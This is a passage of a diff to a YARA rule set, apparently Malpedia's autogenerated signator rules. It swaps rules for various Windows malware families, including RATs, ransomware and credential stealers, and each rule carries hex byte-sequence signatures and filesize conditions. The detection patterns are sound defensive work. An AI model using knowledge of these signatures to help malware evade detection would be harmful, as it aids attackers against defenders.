-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphican_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gamotrol_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e01b6a4a7e17b3788b0929c107b93003400ca0366bc88f55631d49ec789512b2"
+		logic_hash = "41c3f31b322da6e7305bb8343f876e03d328f1fa9fbb5d6f4dcd6733da8fcf8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99350,32 +99347,32 @@ rule MALPEDIA_Win_Graphican_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 894e08 8b15???????? 8d4610 53 50 89560c }
-		$sequence_1 = { b860200000 e8???????? a1???????? 33c5 8945fc 8b4508 }
-		$sequence_2 = { 57 52 50 e8???????? 83c40c 8bc7 }
-		$sequence_3 = { 750e 8b07 8b4808 ffd1 33c0 e9???????? 8b17 }
-		$sequence_4 = { 8d46e7 5e 8915???????? 5b e8???????? }
-		$sequence_5 = { 8b450c 50 56 51 e8???????? }
-		$sequence_6 = { 50 68???????? 6a00 e8???????? 8bc8 83c418 }
-		$sequence_7 = { ffd1 83bde8efffff10 0f82f8000000 8b8dd4efffff }
-		$sequence_8 = { 51 50 ffd2 8bb5c4efffff 33ff 899dd0efffff 899dc8efffff }
-		$sequence_9 = { ddd8 897dc0 8b450c 8b55c4 8938 895004 }
+		$sequence_0 = { 0f877b070000 ff2485ab062e00 834de0ff 897588 8975b0 8975c0 8975c4 }
+		$sequence_1 = { 8d45cc 50 897dcc c745f064da2e00 c745e810000000 e8???????? }
+		$sequence_2 = { 83c447 83ec47 41 49 }
+		$sequence_3 = { 8bc6 c1f805 83e61f 6bf628 033485c09e2f00 }
+		$sequence_4 = { 8be5 90 5d 6803010000 }
+		$sequence_5 = { 03f7 85c0 8975ec 0f86f7000000 8d1c83 90 }
+		$sequence_6 = { 50 ff742410 ff742410 ff742420 ff742420 }
+		$sequence_7 = { 83c001 83c728 3bc1 8945f8 0f8caafeffff 5f 5e }
+		$sequence_8 = { 8be5 90 5d 6aff 6a00 68???????? 6a00 }
+		$sequence_9 = { 830d????????ff 33c0 68???????? c705????????e4dd2e00 c705????????54dd2e00 }
 
 	condition:
-		7 of them and filesize < 362496
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Bit_Rat_Auto : FILE
+rule MALPEDIA_Win_Purelocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e331727c-f0b9-570e-98b3-15c7435a6eef"
+		id = "53ddd96f-5e42-581c-bfdc-76e557b9eeb0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bit_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purelocker_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "7643b584b9c6d670261c45703563f4fa44b2a6b3543e3f79d5e148454f73feea"
+		logic_hash = "cefb5bbad76b31deb583172c70f982572bba50fe45f5283eaffece3891fb88ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99389,32 +99386,32 @@ rule MALPEDIA_Win_Bit_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b37 8bce 6a01 e8???????? 6a01 8bce }
-		$sequence_1 = { e8???????? 6a30 56 e8???????? 83c408 c645fc07 8b4578 }
-		$sequence_2 = { eb09 6a00 6a00 68a7000000 68a4000000 6a22 e8???????? }
-		$sequence_3 = { f6401408 743e 83790400 7538 3bcd 742d 8b4110 }
-		$sequence_4 = { 8b450c 895ddc 8b5d08 2bdf 1bc1 8b4ddc 8945f0 }
-		$sequence_5 = { 8945fc 8d7e10 51 51 57 8945f0 e8???????? }
-		$sequence_6 = { b9d7505e03 2bc8 83f901 7234 2b1f 8d7001 8bc3 }
-		$sequence_7 = { ff742420 52 e8???????? 83c414 85c0 7422 5f }
-		$sequence_8 = { e8???????? 83c40c 85d2 7f06 7ce5 85c0 72e1 }
-		$sequence_9 = { 8bd7 8d4201 8945f0 8a02 42 84c0 75f9 }
+		$sequence_0 = { 83e20f 53 56 8b742430 8d1c02 8b442438 c1fb04 }
+		$sequence_1 = { 5b 5f 83fb00 7505 83ff00 7404 31c0 }
+		$sequence_2 = { 898424c0000000 8b9c24c0000000 21db 744e ffb424bc000000 e8???????? }
+		$sequence_3 = { 5f 3bbc249c000000 7f0f 7c09 3b9c2498000000 7704 }
+		$sequence_4 = { e8???????? 8b542418 52 e8???????? 5a 50 52 }
+		$sequence_5 = { 5f 6a0c 6a00 ff35???????? ff15???????? }
+		$sequence_6 = { 85c0 746f 0fb708 8bf8 6a22 5a 663bca }
+		$sequence_7 = { 8d4508 50 e8???????? 8b4c2420 83c410 890f 8b4c2414 }
+		$sequence_8 = { ff742454 e8???????? 89442450 8b5c2450 21db 7516 }
+		$sequence_9 = { 33c1 894f10 8b4f08 894714 33c8 8bc3 894f18 }
 
 	condition:
-		7 of them and filesize < 19405824
+		7 of them and filesize < 193536
 }
-rule MALPEDIA_Win_Unidentified_106_Auto : FILE
+rule MALPEDIA_Win_Croxloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8675f46d-f715-517e-bc85-af94d8443ca1"
+		id = "5f8b8916-f9ec-55d4-b465-31935c48c0ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_106_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.croxloader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "8b889ebf850fd39b916ba5548e2ee462a29668a970da164f9df6605604203541"
+		logic_hash = "040078157977ad881b28f3c9384cda36c377a63a849b31c6b1d6ac06966284a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99428,34 +99425,34 @@ rule MALPEDIA_Win_Unidentified_106_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33c0 eb2a bdfdffffff 4d85e4 741e 4585ed }
-		$sequence_1 = { f7d7 4881ffb057c96e 410fbff0 48bffd4d2301f6224375 488b7c2428 488b3f ff742408 }
-		$sequence_2 = { c3 44886814 4c8d842480000000 8d4701 b20d 488bcb 6689842480000000 }
-		$sequence_3 = { 8bc1 c1e810 884201 8bc1 c1e808 884202 c6020b }
-		$sequence_4 = { e8???????? 448bf0 85c0 7410 488bcb e8???????? 418bc6 }
-		$sequence_5 = { f20f59f1 f20f587330 0f28c6 f20f5c4328 660f2f4320 7612 4c8b4318 }
-		$sequence_6 = { befdffffff e9???????? 4c8b642448 befeffffff 4c8b6c2428 e9???????? 4c8b642448 }
-		$sequence_7 = { 498bcf e8???????? 85c0 0f8ef1000000 48837f5000 8b442434 894710 }
-		$sequence_8 = { 48ffca 66c1e908 6685c9 75e3 418bf6 ff07 488b9c2428010000 }
-		$sequence_9 = { e8???????? 488b9ed8000000 49c7c4ffffffff 44897d48 4c8be8 44897d50 4d8bf4 }
+		$sequence_0 = { 5b c3 4883ec38 488d05058b0000 41b91b000000 4889442420 }
+		$sequence_1 = { 33d2 4889bc2480030000 488bc8 ff15???????? }
+		$sequence_2 = { 0f841f010000 48895c2418 0f1f440000 4d8b5a60 bb05150000 450fb74a58 }
+		$sequence_3 = { b95595db6d e8???????? 4c8d05e3890100 ba403a485e b95595db6d e8???????? }
+		$sequence_4 = { 4a8b94e010970100 428a4cf23d f6c104 741b 428a44f23e 80e1fb }
+		$sequence_5 = { 488d0d88f90000 4183e23f 4903e8 498bf0 488b04c1 4b8d14d2 4c8b74d028 }
+		$sequence_6 = { 488d05661b0100 488d0d8f1d0100 488905???????? 48890d???????? }
+		$sequence_7 = { 488d3d2c290100 eb12 488b03 4885c0 }
+		$sequence_8 = { 895d9b 428844f13e 4b8b84e010970100 42804cf03d04 }
+		$sequence_9 = { 488d151eecffff 483bc2 7423 65488b042530000000 488b8998000000 483b4810 7206 }
 
 	condition:
-		7 of them and filesize < 27402240
+		7 of them and filesize < 241664
 }
-rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
+rule MALPEDIA_Win_Darkdew_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2de3c422-45bc-58ea-9b58-c5be8e18f59a"
+		id = "72766643-15c8-5d73-9055-fc2b6509a42d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kleptoparasite_stealer_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkdew_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7be717d94b9f90fe9083718b4b3c9a144ee692fe8b9cfc6de9546fc76b8ff287"
-		score = 60
-		quality = 35
+		logic_hash = "b05f670c23077615e6a702bdb8387206cc612d9856e8283c4dc5f994c8c7e0fc"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99467,32 +99464,32 @@ rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7405 8901 895104 8be5 5d c3 3b0d???????? }
-		$sequence_1 = { 8901 895104 8be5 5d c3 3b0d???????? 7502 }
-		$sequence_2 = { cc 55 8bec 56 e8???????? 8b7508 6a02 }
-		$sequence_3 = { cc 55 8bec 56 e8???????? 8b7508 }
-		$sequence_4 = { 895104 8be5 5d c3 3b0d???????? 7502 f3c3 }
-		$sequence_5 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 }
-		$sequence_6 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? }
-		$sequence_7 = { 895104 8be5 5d c3 3b0d???????? }
-		$sequence_8 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 }
-		$sequence_9 = { 8901 895104 8be5 5d c3 3b0d???????? }
+		$sequence_0 = { 85db 7467 8b8d30ffffff b80f78fce1 2bcb f7e9 03d1 }
+		$sequence_1 = { 8b4d18 2bc1 6a03 68???????? 83f803 7221 83fa10 }
+		$sequence_2 = { 03d6 c1fa09 8bf2 c1ee1f 03f2 f7e9 }
+		$sequence_3 = { 8dbd2ce0ffff 81ea44020000 b991000000 8bf3 8955fc }
+		$sequence_4 = { 75f9 8b5d98 2bca 8b5594 }
+		$sequence_5 = { e8???????? 83c40c eb02 2bf3 81ef44020000 }
+		$sequence_6 = { 8b4704 2bc6 50 8b45fc 0544020000 56 }
+		$sequence_7 = { 8b00 89853cfeffff b914060000 8d8534feffff }
+		$sequence_8 = { 837c241402 0f8c0c010000 81c7bcfdffff 897c2410 0f1f00 b80f78fce1 f7ee }
+		$sequence_9 = { f3a5 8b4de8 894dfc eb03 8b45f4 }
 
 	condition:
-		7 of them and filesize < 3006464
+		7 of them and filesize < 279552
 }
-rule MALPEDIA_Win_Paladin_Auto : FILE
+rule MALPEDIA_Win_Pvzout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13b994af-533a-5dbe-b8e1-24beb3442212"
+		id = "7f4c2c6d-072f-520f-bffa-7c86816c46e1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.paladin_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pvzout_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "686a1e9450a5c31100baeb4f1e4232469278fd6c7cba4e878a1957caee81dcdc"
+		logic_hash = "ba6cffc93be56b2981aa18b2dfb2d12dcc79b5b9f031aee7308eec09fd3e12bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99506,32 +99503,32 @@ rule MALPEDIA_Win_Paladin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c8ff 8b8c24e4010000 64890d00000000 81c4f0010000 c20400 8d4c2400 }
-		$sequence_1 = { eb37 8bce e8???????? 5e c20800 e8???????? 5e }
-		$sequence_2 = { 83f81a 8944241c 0f8cb6feffff 56 ff15???????? 8b4c2434 8d8424a4020000 }
-		$sequence_3 = { eb0c c744241430a80010 8b7c2414 8b2d???????? }
-		$sequence_4 = { 8d0417 8d0440 8d0480 c1e002 3bf0 7344 833d????????01 }
-		$sequence_5 = { ffd7 8b4e18 3bcb 7406 8b11 6a01 ff12 }
-		$sequence_6 = { 50 52 ff15???????? e9???????? 3d05010000 7417 }
-		$sequence_7 = { 8b4604 8d4e08 894204 e8???????? 56 e8???????? 8b4f14 }
-		$sequence_8 = { 6a00 52 ff15???????? 8b4624 8b4c2410 2bc3 8b6e58 }
-		$sequence_9 = { 85f6 897c2428 0f8490000000 85ff 0f8488000000 55 }
+		$sequence_0 = { 0e 75a8 43 2f }
+		$sequence_1 = { 0e 75a8 43 1dea50873a d4a1 }
+		$sequence_2 = { e21c 3e3f 19e9 73f8 dca10ebd24e8 252b0026cb 9e }
+		$sequence_3 = { 75a8 43 2f 3089f33d80f3 }
+		$sequence_4 = { 03dd 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 8d8594040000 50 }
+		$sequence_5 = { b8132d0000 50 038588040000 59 0bc9 89850e040000 61 }
+		$sequence_6 = { 01e3 b105 18830d88a01c 51 }
+		$sequence_7 = { bf95f6810e 75a8 43 1dea50873a d4a1 }
+		$sequence_8 = { 5d bbedffffff 03dd 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 }
+		$sequence_9 = { b3d7 5a bf95f6810e 75a8 43 1dea50873a }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Grimagent_Auto : FILE
+rule MALPEDIA_Win_Meduza_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "382b2b71-faf8-5a36-9cf2-cfc0231fe5c7"
+		id = "53f96cd6-21f2-53a2-bbb8-b71563537ed2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grimagent_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meduza_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "cb883960783c6a0a5fc69c20e118ca0de5603c9daad18851a44812dd938995b0"
+		logic_hash = "14b88dc41a5c318d90c279963aa5ad461ee65cb9acf5c901876d99dfeb325a5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99545,32 +99542,32 @@ rule MALPEDIA_Win_Grimagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec0c 8b450c 8945f8 c745fc00220400 8b4dfc 51 }
-		$sequence_1 = { 8b550c 8955fc 8b450c 50 e8???????? 83c404 3945f8 }
-		$sequence_2 = { 0f8394000000 8b4df0 0fb711 8b45fc }
-		$sequence_3 = { e8???????? 83c404 3945f8 750e c745e801000000 b801000000 eb1a }
-		$sequence_4 = { 7328 8b55ec 0fb702 8b4dfc 0fb711 3bc2 7514 }
-		$sequence_5 = { c745f801000000 ebcc 8b45fc 50 ff15???????? }
-		$sequence_6 = { 85c0 7507 c745f801000000 ebcc 8b45fc 50 }
-		$sequence_7 = { 8b450c 50 e8???????? 83c404 3945f8 750e }
-		$sequence_8 = { 50 e8???????? 85c0 7420 8b4d08 51 8d95f4feffff }
-		$sequence_9 = { 8b4d0c 83c101 894d0c ebd0 }
+		$sequence_0 = { 83f81f 0f87f959fdff 51 52 e8???????? 83c408 c705????????00000000 }
+		$sequence_1 = { 898ddcfcffff 8d8d80f5ffff 8985d8fcffff 8d5101 660fef8dd0fcffff 0f298d80f5ffff }
+		$sequence_2 = { e8???????? c645fc1d 0f57c0 c785d8f6ffff9929e731 c785dcf6ffffa8016d5b 8b85d8f6ffff 8b8ddcf6ffff }
+		$sequence_3 = { ff15???????? a1???????? 85c0 7407 50 ff15???????? ff15???????? }
+		$sequence_4 = { 8945dc 8b45d4 03c2 6a00 6800ca9a3b 13cf 51 }
+		$sequence_5 = { 8b4114 8b5110 2bc2 3bc7 7218 83791410 8d4201 }
+		$sequence_6 = { c78540ffffff00000000 c78544ffffff00000000 85f6 7424 83c8ff f00fc14604 751a }
+		$sequence_7 = { 8b8ddce4ffff 0f288d30e1ffff 898dfcfcffff 8d8d30e1ffff 8985f8fcffff 8d5101 660fef8df0fcffff }
+		$sequence_8 = { 894da4 c7855cffffff9d412b44 8b8558ffffff 8b8d5cffffff 0f288d20ffffff 894dac 8d8d20ffffff }
+		$sequence_9 = { 8b4dec c745e8d6352f2b 898590feffff 898d94feffff c745ec4a55cf55 8b45e8 8b4dec }
 
 	condition:
-		7 of them and filesize < 582656
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Turnedup_Auto : FILE
+rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9cef3df1-e6dd-5dcd-8eeb-7fa8aae510b3"
+		id = "93781915-1cb2-5abd-9774-3e668f8666c9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turnedup_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_kt3_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "f114ccc267f7ff6c1934261ef01804f10c4ed0bd6285f48c3f30e4d8aac2153d"
+		logic_hash = "44b6f2b326248f3f927f1e4016d6365a022a7c825a43b779fc8768d5c422e7ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99584,32 +99581,32 @@ rule MALPEDIA_Win_Turnedup_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7414 85c0 780a b900020000 2bca }
-		$sequence_1 = { 8b5dbc c60365 8b0e 43 895dbc 85c9 }
-		$sequence_2 = { 391d???????? 757d 6a01 53 8d450c 50 }
-		$sequence_3 = { 895dfc 752b 6a00 8d4df8 e8???????? 833d????????00 }
-		$sequence_4 = { 60 33c0 3e8b7c2424 33c9 }
-		$sequence_5 = { 7434 8b4120 833800 741b 8b5130 833a00 7e13 }
-		$sequence_6 = { 83ec1c 8bcc 6a14 c741140f000000 }
-		$sequence_7 = { e8???????? 83c404 3bc3 7433 8b0d???????? 8904b1 }
-		$sequence_8 = { 6a01 8bcf ffd0 8b4da4 8b11 8b520c }
-		$sequence_9 = { 8b5f10 85db 7438 8b4f14 83f910 }
+		$sequence_0 = { 8b4d0c 034dfc 894d0c 8b55f8 2b55fc }
+		$sequence_1 = { f2ae f7d1 83c1ff b804010000 2bc1 50 }
+		$sequence_2 = { 8b45d0 50 e8???????? 83c404 b801000000 5f 5e }
+		$sequence_3 = { c705????????043a4000 c705????????ac3a4000 a3???????? c3 }
+		$sequence_4 = { 8b4ddc 8b11 52 ff15???????? 0f8408000000 0f8502000000 }
+		$sequence_5 = { 51 ff15???????? 8b55e8 0fbe02 83f873 }
+		$sequence_6 = { e9???????? b911000000 33c0 8dbda8feffff f3ab c785a8feffff44000000 }
+		$sequence_7 = { 0f8408000000 0f8502000000 ebe9 8b85b0fdffff }
+		$sequence_8 = { 83e103 f3a4 eb68 8b4d08 c70100000000 6a3a 8b55e8 }
+		$sequence_9 = { 8985f0fbffff 0f8408000000 0f8502000000 ebe9 68???????? }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Morto_Auto : FILE
+rule MALPEDIA_Win_Rarog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9daa15ad-04bd-517d-96ea-e01678db73e5"
+		id = "6993ce44-e3a7-570d-bdd2-f949ea883388"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.morto_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rarog_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "6193315806789c46deee4d81d57339bc016356ef937c67c10ba9195e0e60ffaf"
+		logic_hash = "dcc275a3610670298392baeef430ff6a6f46366e16201b4054f65002692c15e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99623,32 +99620,32 @@ rule MALPEDIA_Win_Morto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a03 53 6a03 8d8594fdffff 57 50 ff15???????? }
-		$sequence_1 = { 84c9 7412 8a5601 8aca 3a5701 750c }
-		$sequence_2 = { 85c0 7543 8a45ff be???????? fec0 8bce 50 }
-		$sequence_3 = { 53 50 56 89750c }
-		$sequence_4 = { a3???????? e8???????? 6a01 68???????? ff35???????? a3???????? }
-		$sequence_5 = { ebb6 8b02 0345fc eb02 }
-		$sequence_6 = { 50 e8???????? 83c40c 8945e4 8d45cc }
-		$sequence_7 = { 55 8bec 81ec10020000 53 8b5d08 8365f800 56 }
-		$sequence_8 = { 7533 8d8594fdffff 56 50 8d4594 50 }
-		$sequence_9 = { eb0a 33d2 8a1419 41 8d441201 8bd0 c1ea08 }
+		$sequence_0 = { 6a00 68ffff1f00 ff15???????? 8bf8 57 ff15???????? 57 }
+		$sequence_1 = { 8819 e8???????? 83ec1c 8bc4 89a590fbffff 50 c645fc61 }
+		$sequence_2 = { 8d8dd0feffff e8???????? 8d8d9cfdffff 51 8d8db4feffff 51 8bc8 }
+		$sequence_3 = { 8d8d7cfeffff e9???????? 8d8dd0feffff e9???????? }
+		$sequence_4 = { 8bf0 8bc4 e8???????? 83ec1c 8bcc c645fc3a 89a58cfbffff }
+		$sequence_5 = { 50 e8???????? 59 59 3bc7 7431 8bce }
+		$sequence_6 = { c746140f000000 895e10 881e 895dfc 8b4710 0305???????? }
+		$sequence_7 = { 83c40c ff75b4 8945ac 0fbe45a0 50 57 }
+		$sequence_8 = { e9???????? 8d8dfcfeffff e9???????? 8d8d50ffffff e9???????? 8d4da4 e9???????? }
+		$sequence_9 = { 53 56 8d8d2cfdffff e8???????? 53 56 8d8df4fcffff }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Unidentified_099_Auto : FILE
+rule MALPEDIA_Win_Nighthawk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d97436b2-5a7b-573d-8a35-42ed42551daa"
+		id = "031218c2-08fe-51c2-a9be-67ba73d1aae5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_099_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nighthawk_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "05815599a06afec044356539b7fb022948a8fa88c4aa5bb33d6e484e946176ef"
+		logic_hash = "477ee6b7607005d8498fab8a4f21f58e1d0451668a3652d5802801764720896d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99662,32 +99659,32 @@ rule MALPEDIA_Win_Unidentified_099_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d8bc4 418bd6 498bcf e8???????? 4c8d8df0010000 458bc6 498bd7 }
-		$sequence_1 = { c5f35cca c4c173590cc1 4c8d0d158f0000 c5f359c1 c5fb101d???????? }
-		$sequence_2 = { 33d2 488bce ff15???????? 488bce 85c0 0f84be000000 4c8d4c244c }
-		$sequence_3 = { 4883f9ff 7406 ff15???????? 48832300 4883c308 488d050d9e0100 }
-		$sequence_4 = { f7842484000000f8ffffff 4c89b424b8210000 448bf7 0f8651020000 48899c24e0210000 4889ac24e8210000 4889b424f0210000 }
-		$sequence_5 = { 488bf9 498bc2 418be9 48c1f806 488d0db4ee0000 4183e23f }
-		$sequence_6 = { 0f1005???????? 0fb7442440 0f1101 66894110 488d4b26 4885c9 }
-		$sequence_7 = { b910000000 e8???????? 4c8bc8 488bf8 33c0 }
-		$sequence_8 = { 488b05???????? 4833c4 48898580020000 b940000000 e8???????? }
-		$sequence_9 = { c7442470fedcba98 c744247476543210 660f1f440000 49ffc0 42803c0000 75f6 488d55d0 }
+		$sequence_0 = { 7405 e8???????? 4c8965b8 48c745c00f000000 448865a8 488d0d83250c00 ff15???????? }
+		$sequence_1 = { 8b442430 39442470 731f 488d8c24f8000000 e8???????? 8b4c2470 488b542450 }
+		$sequence_2 = { 488bf0 4c897560 4c89742470 4489742478 4c89742450 4c89742460 458d660f }
+		$sequence_3 = { 4c8d85a0000000 8d53a2 488b4008 ff15???????? 85c0 0f844a040000 448b4510 }
+		$sequence_4 = { 57 4883ec30 488bd9 0f57c0 8b490c 488bfa 0f11442420 }
+		$sequence_5 = { 83e00f 2bc2 4898 488b8c2448010000 0fb60401 8b8c24d4000000 03c8 }
+		$sequence_6 = { 4885c0 488bf8 742e 4c8bc3 498bd6 488bc8 e8???????? }
+		$sequence_7 = { 740a 4c8b7920 4c037918 eb03 4c8bfe 4c89bd20010000 e9???????? }
+		$sequence_8 = { 83ea01 7407 83fa01 752c eb11 48833d????????00 488d05e70a0300 }
+		$sequence_9 = { 755b 488365df00 488365ef00 48c745f70f000000 458d4610 488d1577010600 }
 
 	condition:
-		7 of them and filesize < 314368
+		7 of them and filesize < 1949696
 }
-rule MALPEDIA_Win_Sysjoker_Auto : FILE
+rule MALPEDIA_Win_Nestegg_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6b88483-c0cd-564a-a7b0-6f38f31ef535"
+		id = "315a7796-8683-5d7a-8cf2-784c6dd94f9d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysjoker_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nestegg_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "d98bfbb9945f0ec0fc3cad0efe9bd86fca6a269db3916cb189ae165a81048301"
+		logic_hash = "4273a1509259a06eece460649eb821123ed1b442866d55968fb9b1f2cfa0fb16"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99701,32 +99698,32 @@ rule MALPEDIA_Win_Sysjoker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
